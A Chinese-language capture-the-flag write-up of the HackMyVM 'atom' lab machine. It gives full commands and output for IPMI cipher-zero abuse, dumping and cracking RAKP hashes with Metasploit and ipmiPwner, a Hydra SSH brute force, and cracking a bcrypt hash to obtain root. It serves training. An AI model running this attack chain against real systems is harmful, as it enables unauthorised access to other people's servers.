[hackmyvm]atom解析WP

nmap信息收集

这是个easy的靶机，我以为很常规，结果nmap就扫出个22端口，开始就让我无从下手，hhh

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:8e:6d:12       (Unknown)
192.168.56.115  08:00:27:dd:d0:ad       (Unknown) ##靶机ip

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.881 seconds (136.10 hosts/sec). 3 responded
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- 192.168.56.115 ##我还加了全端口参数，尼玛，人傻了
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:34 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00091s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.56.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds

没办法看了下wp（看wp是个学习的过程），nmap默认只扫tcp连接，

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -sV --version-intensity 0 -n -F -T4 192.168.56.115
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:42 EDT
Warning: 192.168.56.115 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.56.115
Host is up (0.00060s latency).
Not shown: 56 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
PORT    STATE SERVICE  VERSION
623/udp open  asf-rmcp
MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.74 seconds

-sU扫udp连接，不过很慢，还加了检测强度参数–version-intensity 0 ，具体见下

• -sU: 这个选项告诉 nmap 仅扫描 UDP 端口。默认情况下，nmap 会同时扫描 TCP 和 UDP 端口，但如果你只对 UDP 端口感兴趣，可以使用这个选项。
• -sV: 这个选项使 nmap 尝试确定目标机器上开放端口的服务版本信息。这通过向端口发送一系列探测包并解析响应来实现。
• --version-intensity 0: 这个选项用于调整版本检测的强度。强度值从 0 到 9，其中 0 表示非常轻量级的检测（仅发送一些基本的探测包），而 9 表示最彻底的检测（可能会发送大量的探测包，但可能会花费更多时间并暴露更多的扫描活动）。
• -n: 这个选项告诉 nmap 在进行扫描时不要进行 DNS 解析。这可以加快扫描速度，特别是在扫描大量 IP 地址时，因为 DNS 解析可能会成为瓶颈。
• -F: 这个选项是 --fast 的简写，它使 nmap 更快地进行扫描。它会减少扫描的端口数量（只扫描最常见的 100 个端口），并可能减少扫描时间或发送的探测包数量。这对于快速获取目标系统的基本信息很有用。
• -T4: 这个选项用于设置扫描的时间模板。nmap 提供了几种不同的时间模板（从 0 到 5），其中 0 是最慢的（最隐蔽的），而 5 是最快的（但可能更容易被检测到）。-T4 是一个中等速度的设置，它在扫描速度和隐蔽性之间做了一个折中。

其实nmap这个工具很好用的，还可以使用脚本，这个我第一次使用，另外除了使用nmap检测版本还可以使用metasploit检测，我贴在下面了

IPMI 服务

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --script ipmi-version -p 623 192.168.56.115       ##用了ipmi版本检测脚本
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 08:46 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00054s latency).

PORT    STATE SERVICE
623/udp open  asf-rmcp 
| ipmi-version: 
|   Version: 
|     IPMI-2.0 ##是2.0版本，一般都有漏洞的
|   UserAuth: password, md5, md2, null
|   PassAuth: auth_msg, auth_user, non_null_user
|_  Level: 1.5, 2.0
MAC Address: 08:00:27:DD:D0:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds

msf6 > search ipmi

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank    Check  Description
   -  ----                                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ipmi/ipmi_cipher_zero                 2013-06-20       normal  No     IPMI 2.0 Cipher Zero Authentication Bypass Scanner
   1  auxiliary/scanner/ipmi/ipmi_dumphashes                  2013-06-20       normal  No     IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
   2  auxiliary/scanner/ipmi/ipmi_version                                    normal  No     IPMI Information Discovery      ###就是这个  
   3  exploit/multi/upnp/libupnp_ssdp_overflow                2013-01-29       normal  No     Portable UPnP SDK unique_service_name() Remote Code Execution
   4  auxiliary/scanner/http/smt_ipmi_cgi_scanner             2013-11-06       normal  No     Supermicro Onboard IPMI CGI Vulnerability Scanner
   5  auxiliary/scanner/http/smt_ipmi_49152_exposure          2014-06-19       normal  No     Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
   6  auxiliary/scanner/http/smt_ipmi_static_cert_scanner     2013-11-06       normal  No     Supermicro Onboard IPMI Static SSL Certificate Scanner
   7  exploit/linux/http/smt_ipmi_close_window_bof            2013-11-06       good    Yes    Supermicro Onboard IPMI close_window.cgi Buffer Overflow
   8  auxiliary/scanner/http/smt_ipmi_url_redirect_traversal  2013-11-06       normal  No     Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal


Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/http/smt_ipmi_url_redirect_traversal

msf6 > use 2
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/u
                                         sing-metasploit/basics/using-metasploit.html
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_version) > set RhOSTS 192.168.56.115
RhOSTS => 192.168.56.115
msf6 auxiliary(scanner/ipmi/ipmi_version) > exploit 

[*] Sending IPMI requests to 192.168.56.115->192.168.56.115 (1 hosts)
[+] 192.168.56.115:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user)  PassAuth(password, md5, md2, null) Level(1.5, 2.0) ##这也能看版本信息
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

在hacktricks网站上找到了漏洞利用方法

根据文档使用metasploit辅助扫描

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_cipher_zero):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/u
                                         sing-metasploit/basics/using-metasploit.html
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RhOSTS 192.168.56.115
RhOSTS => 192.168.56.115
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > exploit 

[*] Sending IPMI requests to 192.168.56.115->192.168.56.115 (1 hosts)
[+] 192.168.56.115:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero ##提示accepted 那就是可以利用这个漏洞
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > 

接着用ipmitool工具列出其他用户名和修改密码，但是先用msf枚举出用户名和密码连上远程服务器才能用ipmitool获取用户列表

msf6 > use 1
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting          Required  Description
   ----                  ---------------          --------  -----------
   CRACK_COMMON          true                     yes       Automatically crack common passwords as
                                                             they are obtained
   OUTPUT_HASHCAT_FILE                            no        Save captured password hashes in hashca
                                                            t format
   OUTPUT_JOHN_FILE                               no        Save captured password hashes in john t
                                                            he ripper format
   PASS_FILE             /usr/share/metasploit-f  yes       File containing common passwords for of
                         ramework/data/wordlists            fline cracking, one per line
                         /ipmi_passwords.txt
   RHOSTS                                         yes       The target host(s), see https://docs.me
                                                            tasploit.com/docs/using-metasploit/basi
                                                            cs/using-metasploit.html
   RPORT                 623                      yes       The target port
   SESSION_MAX_ATTEMPTS  5                        yes       Maximum number of session retries, requ
                                                            ired on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                        yes       Delay between session retries in second
                                                            s
   THREADS               1                        yes       The number of concurrent threads (max o
                                                            ne per host)
   USER_FILE             /usr/share/metasploit-f  yes       File containing usernames, one per line
                         ramework/data/wordlists
                         /ipmi_users.txt


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RhOSTS 192.168.56.115
RhOSTS => 192.168.56.115
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > exploit 

[+] 192.168.56.115:623 - IPMI - Hash found: admin:a33a715f02020000a5983950706d218ab0474064ec26f7b3ae3d0b67cf10c73f932bdddfd30be8e7a123456789abcdefa123456789abcdef140561646d696e:6724ccc198e5339b2ce222ddbeb665e4596efd17
[+] 192.168.56.115:623 - IPMI - Hash for user 'admin' matches password 'cukorborso' ##很快一下就出来了
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

那就用ipmitool连接一下，现查一下如何使用

┌──(kali㉿kali)-[~]
└─$ ipmitool -I lanplus -C 0 -H 192.168.56.115 -U admin -P cukorborso user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   admin            true    false      true       ADMINISTRATOR
3   analiese         true    false      true       USER
4   briella          true    false      true       USER
5   richardson       true    false      true       USER
6   carsten          true    false      true       USER
7   sibylle          true    false      true       USER
8   wai-ching        true    false      true       USER
9   jerrilee         true    false      true       USER
10  glynn            true    false      true       USER
11  asia             true    false      true       USER
12  zaylen           true    false      true       USER
13  fabien           true    false      true       USER
14  merola           true    false      true       USER
15  jem              true    false      true       USER
16  riyaz            true    false      true       USER
17  laten            true    false      true       USER
18  cati             true    false      true       USER
19  rozalia          true    false      true       USER
20  palmer           true    false      true       USER
21  onida            true    false      true       USER
22  terra            true    false      true       USER
23  ranga            true    false      true       USER
24  harrie           true    false      true       USER
25  pauly            true    false      true       USER
26  els              true    false      true       USER
27  bqb              true    false      true       USER
28  karlotte         true    false      true       USER
29  zali             true    false      true       USER
30  ende             true    false      true       USER
31  stacey           true    false      true       USER
32  shirin           true    false      true       USER
33  kaki             true    false      true       USER
34  saman            true    false      true       USER
35  kalie            true    false      true       USER
36  deshawn          true    false      true       USER
37  mayeul           true    false      true       USER
38                   true    false      false      Unknown (0x00)
39                   true    false      false      Unknown (0x00)
40                   true    false      false      Unknown (0x00)
41                   true    false      false      Unknown (0x00)
42                   true    false      false      Unknown (0x00)
43                   true    false      false      Unknown (0x00)
44                   true    false      false      Unknown (0x00)
45                   true    false      false      Unknown (0x00)
46                   true    false      false      Unknown (0x00)
47                   true    false      false      Unknown (0x00)
48                   true    false      false      Unknown (0x00)
49                   true    false      false      Unknown (0x00)
50                   true    false      false      Unknown (0x00)
51                   true    false      false      Unknown (0x00)
52                   true    false      false      Unknown (0x00)
53                   true    false      false      Unknown (0x00)
54                   true    false      false      Unknown (0x00)
55                   true    false      false      Unknown (0x00)
56                   true    false      false      Unknown (0x00)
57                   true    false      false      Unknown (0x00)
58                   true    false      false      Unknown (0x00)
59                   true    false      false      Unknown (0x00)
60                   true    false      false      Unknown (0x00)
61                   true    false      false      Unknown (0x00)
62                   true    false      false      Unknown (0x00)
63                   true    false      false      Unknown (0x00)

ipmitool: 这是用于调用IPMI工具的基本命令。

-I lanplus: 这个选项指定使用的IPMI接口。

• lanplus 表示使用LAN接口，通过IPMI v2.0的安全协议进行通信。这是远程管理的推荐方法。

-C 0: 这个选项指定用于认证的加密套件。

• 0 表示不指定特定的加密套件，默认使用第一个可用的加密套件。加密套件决定了客户端（ipmitool）与IPMI接口之间通信的加密级别和类型。

-H 192.168.56.115: 这个选项指定被管理设备的目标IP地址。

• 192.168.56.115 是你要通信的BMC（基板管理控制器）或IPMI设备的IP地址。

-U admin: 这个选项指定用于认证的用户名。

• admin 是用于访问IPMI接口的用户名。

-P cukorborso: 这个选项指定用于认证的密码。

• cukorborso 是与 admin 用户关联的密码。

user list: 这是要执行的IPMI命令。

• user list 用于检索目标设备上配置的所有IPMI用户列表。

IPMI Tools利用

好像用户还挺多的但又卡住了，结合之前在tcp上扫到22端口开放的，尝试使用这个ipmi用户名密码登录一下ssh，额，好像是不行，ipmitool这个工具只能修改用户密码，不能查看密码，不过好在Github上有脚本可以查看密码（类似于上文的msf的枚举密码也是dumphash），尝试一下

c0rnf13ld/ipmiPwner: 利用漏洞来转储 ipmi 哈希 — c0rnf13ld/ipmiPwner: Exploit to dump ipmi hashes (github.com)

先把项目git clone到kali上，执行下requirements.sh安装下依赖环境，不过我看了下我本机都有就不运行了

┌──(kali㉿kali)-[~/atom]
└─$ git clone https://gitclone.com/github.com/c0rnf13ld/ipmiPwner.git
Cloning into 'ipmiPwner'...
remote: 对象计数中: 8, 完成.
remote: 压缩对象中: 100% (6/6), 完成.
remote: Total 8 (delta 1), reused 8 (delta 1)
Unpacking objects: 100% (8/8), 6.72 KiB | 1.12 MiB/s, done.
┌──(kali㉿kali)-[~/atom]
└─$ cd ipmiPwner 
┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat requirements.sh
#!/bin/bash

if [ "$(id -u)" -ne 0 ]; then
        echo -e "\n[*] You must be root to run the script"
        exit
fi

function ctrl_c(){
        tput cnorm
        echo -e "\n\n[*] Exiting...\n"
        exit
}

trap ctrl_c int
tput civis; echo -ne "\n\n[*] Installing requirements\n\n"
apt-get install ipmitool nmap python3 python3-pip -y ##就是装这几个软件
echo -ne "\n\n[*] Installing python3 requirements\n\n"
pip3 install shodan colorama python-nmap ##python上装几个库
echo -ne "\n\n[*] All requirements have been installed\n"; tput cnorm      

不过他需要一个用户列表，那就使用awk把用户过滤出来，为了帮助更好的理解使用awk（很牛逼的文本处理工具）下面贴个示例，不过我们这个分隔符是空格

输入分隔符

假设有一个test.txt文本文件，其内容如下所示，共4行，每行由逗号分隔成三个元素。现在，通过后续的几种方式对它进行分列操作。

cat test.txt
1

sample1,male,12
sample2,female,23
sample3,male,15
sample4,female,28

1. 第一种方式：通过-F参数实现

通过 -F 参数指定分隔符。需要注意的是，分隔符紧跟在-F参数后面（中间没有空格）。

awk -F, '{print $2}' test.txt
1

male
female
male
female

awk文本处理

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ ipmitool -I lanplus -C 0 -H 192.168.56.115 -U admin -P cukorborso user list|awk -F '[ ]' '{print $3}'|uniq -u >user
  ##uniq -u是去除重复项的作用                                                                                            
┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat user
Name ##手动把这个删掉，剩下的就全是用户名了
glynn
asia
zaylen
fabien
merola
jem
riyaz
laten
cati
rozalia
palmer
onida
terra
ranga
harrie
pauly
els
bqb
karlotte
zali
ende
stacey
shirin
kaki
saman
kalie
deshawn
mayeul

我们用glynn这个用户试试水，看看脚本能不能用

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ sudo python3 ipmipwner.py --host 192.168.56.115 -u glynn -c john -pW /usr/share/wordlists/rockyou.txt -oH hash 
[*] Checking if port 623 for host 192.168.56.115 is active
[*] The username: glynn is valid                                                  
[*] Saving hash for user: glynn in file: "hash"
[*] The hash for user: glynn
   \_ $rakp$a4a3a2a0820c00003e6590e5a4eafbafffd2cb46e796bafcf7bb91a2d4efbf5bb6d97179e60f1e57a123456789abcdefa123456789abcdef1405676c796e6e$82cf7025b77994028f0357833efc33cd1ea8d32d
[*] Starting the hash cracking with john

Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 AVX 4x])
Will run 8 OpenMP threads
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
evan             (192.168.56.115 glynn)     —##evan就是glynn的密码
1g 0:00:00:00 DONE (2024-09-06 10:21) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

根据项目文档说明，-c john就是获取到hash再通过john碰撞rockyou字典得到密码

那用user文本批量碰撞hash，呃呃，好像不能直接把user丢进去让他自动碰撞

那就写个循环

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ for i in $(cat user);do sudo python3 ipmipwner.py --host 192.168.56.115 -u $i -c john -pW /usr/share/wordlists/rockyou.txt -oH hash>>pass;done ## 使用for循环遍历user文本中的字符串，-u参数后加变量$i ，可以是可以就是有一点点慢，多等一会就好了

出来了cat一下pass文本，发现太杂了，用grep和awk尝试过滤一下

说实话我不太会这两个工具，只能一点点问GPT

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat pass | grep -A 1 "Loaded" |awk '{print $1}'| awk '/Loaded/{p=NR+1} p==NR'         
evan
TWEETY1
120691
chatroom
mackenzie2
081704
djones
trick1
122987
batman!
phones
jiggaman
sexymoma
jaffa1
071590
515253
dezzy
290992
emeralds
poynter
tripod
castillo1
kittyboo
numberone
090506
billandben
milo123
241107
                                                                                              
┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ cat pass | grep -A 1 "Loaded" |awk '{print $1}'| awk '/Loaded/{p=NR+1} p==NR'>password

hydra爆破

最后使用hydra九头蛇爆破一下ssh

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ hydra -L user -P password 192.168.56.115 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-06 11:15:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 784 login tries (l:28/p:28), ~49 tries per task
[DATA] attacking ssh://192.168.56.115:22/
[STATUS] 318.00 tries/min, 318 tries in 00:01h, 467 to do in 00:02h, 15 active
[22][ssh] host: 192.168.56.115   login: onida   password: jiggaman ##还真找到一下，直接登上看一下
[STATUS] 301.50 tries/min, 603 tries in 00:02h, 183 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-06 11:18:41

登入onida用户

┌──(kali㉿kali)-[~/atom/ipmiPwner]
└─$ ssh [email protected]
[email protected]'s password: 
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
onida@atom:~$ sudo -l
-bash: sudo: command not found
onida@atom:~$ ls
user.txt
onida@atom:~$ cat user.txt 
f75390001fa2fe806b4e3f1e5dadeb2b
onida@atom:~$ 

ssh登上就直接拿到user的flag了，

提权Root

信息搜集

进入之后随便翻一下目录，发现有个www网站，顺便看了下开放的端口，发现有两个端口只在本机开放

onida@atom:~$ cd /var/www/html/
onida@atom:/var/www/html$ ls  ##下面有个db数据库文件
atom-2400-database.db   css  img  index.php  js  login.php  profile.php  register.php  video
onida@atom:/var/www/html$ ss -ltup
Netid   State    Recv-Q   Send-Q     Local Address:Port         Peer Address:Port   Process   
udp     UNCONN   0        0                0.0.0.0:asf-rmcp          0.0.0.0:*                
tcp     LISTEN   0        4096           127.0.0.1:36269             0.0.0.0:*           ##     
tcp     LISTEN   0        4096             0.0.0.0:623               0.0.0.0:*                
tcp     LISTEN   0        511            127.0.0.1:http              0.0.0.0:*           ##     
tcp     LISTEN   0        128              0.0.0.0:ssh               0.0.0.0:*                
tcp     LISTEN   0        128                 [::]:ssh                  [::]:*             

有个数据库文件cat了一下，不粗所料应该就是root的密码，因为机器名就叫atom

onida@atom:/var/www/html$ cat atom-2400-database.db 
Q�Y�&��mtableusersusersCREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE NOT NULL,
    password TEXT NOT NULL
))=indexsqlite_autoindex_users_1user�$))�tablelogin_attemptslogin_attemptsCREATE TABLE login_attempts (
    id INTEGER PRIMARY KEY,
    ip_address TEXT NOT NULL,
    attempt_time INTEGER NOT NULL
��nKE�atom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm
���     atom


        onida@atom:/var/www/html$ 

但是显示乱码了，靶机竟然装了sqlite，那就用数据库软件看看，好吧其实cat也就能看，只不过不太明显

onida@atom:/var/www/html$ sqlite3 atom-2400-database.db 
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables ##见下
login_attempts  users         
sqlite> select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm ##用户atom的hash
sqlite> 

.tables 是 SQLite3 命令行中的一条命令，用于显示当前数据库中所有的表格（表）的列表

除了 .tables 命令之外，还有一些其他用于显示所有表格的命令：

1. .schema：显示数据库中的所有表格的创建语句，包括表格的字段、约束等信息。
2. SELECT name FROM sqlite_master WHERE type='table'：使用 SQL 查询语句也可以查看数据库中的所有表格，这条命令会返回数据库中所有表格的名称。

既然拿到hash那就john一把梭，要么hashcat随便你用哪种

下面我用hashcat，我觉得hashcat比较多功能，john太无脑了hhhhh

hashcat -m 3200 -a 0 pass /usr/share/seclists/Passwords/500-worst-passwords.txt ##这个字典比较快
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12600KF, 2915/5894 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/seclists/Passwords/500-worst-passwords.txt
* Passwords.: 499
* Bytes.....: 3491
* Keyspace..: 499
* Runtime...: 0 secs

$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm:madison ##这是密码
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7p...2fH9Cm
Time.Started.....: Sat Sep  7 03:42:24 2024 (3 secs)
Time.Estimated...: Sat Sep  7 03:42:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/500-worst-passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      127 H/s (3.26ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 448/499 (89.78%)
Rejected.........: 0/448 (0.00%)
Restore.Point....: 384/499 (76.95%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: erotic -> arthur
Hardware.Mon.#1..: Util: 79%

Started: Sat Sep  7 03:41:59 2024
Stopped: Sat Sep  7 03:42:29 2024
onida@atom:~$ su -
Password: 
root@atom:~# ls
root.txt
root@atom:~# cat root.txt 
d3a4fd660f1af5a7e3c2f17314f4a962

直接拿下，其实除了刚开始的ipmi后面都不难，确实可以算easy

玛德，做了我快四个钟了